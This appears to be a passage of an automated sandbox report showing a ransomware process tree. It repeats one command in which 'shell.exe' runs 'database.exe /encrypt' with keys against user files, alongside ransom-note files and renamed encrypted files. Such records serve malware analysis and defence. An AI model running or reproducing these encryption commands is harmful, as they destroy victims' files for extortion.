                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\MSN Websites\MSN.url.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4684
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\MSN Websites\MSNBC News.url.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6040
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\MSN Websites\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:3108
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\Windows Live\Get Windows Live.url.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5816
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\Windows Live\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:3728
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\Windows Live\Windows Live Gallery.url.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:6096
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\Windows Live\Windows Live Mail.url.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6068
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\Windows Live\Windows Live Spaces.url.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:3320
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Links\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5296
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Links\Desktop.lnk.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6460
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Links\Downloads.lnk.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1744
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Links\RecentPlaces.lnk.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5848
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Links\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2872
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\!HELP_SOS.hta.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5392
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\#Decrypt_Files_ReadMe#.rtf.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3760
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\0mdLDRha-sb7ecrQQ.[[email protected]].gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5124
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\ApproveProtect.xps.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1624
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\BackupSend.mpe.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4356
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
